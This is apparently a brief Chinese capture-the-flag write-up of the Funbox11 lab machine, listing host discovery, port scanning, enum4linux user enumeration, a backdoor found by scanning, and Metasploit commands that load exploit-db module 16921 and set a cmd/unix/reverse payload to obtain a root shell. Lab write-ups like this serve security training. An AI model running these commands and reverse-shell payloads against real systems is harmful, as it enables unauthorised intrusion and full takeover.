ailx10
网络安全优秀回答者
网络安全硕士
去咨询
1、主机发现主机发现
2、端口扫描端口扫描
banner 扫描
3、配置hosts并访问页面192.168.199.207 funbox11访问页面
4、枚举用户名(bill)enum4linux -a 192.168.199.207枚举用户名
5、目录发现目录发现
访问页面
6、漏洞扫描,存在后门漏洞扫描
7、将rb文件放在msf 框架中,启动msf consolemv /usr/share/exploitdb/exploits/linux/remote/16921.rb /usr/share/metasploit-framework/modules/exploits/mytestreload_alluse exploit/mytest/16921启动msf
8、漏洞利用,直接获得root权限set payload payload/cmd/unix/reverseset LHOST 192.168.199.247set RHOSTS 192.168.199.207run漏洞利用
获得root的flag
到此,实验完成~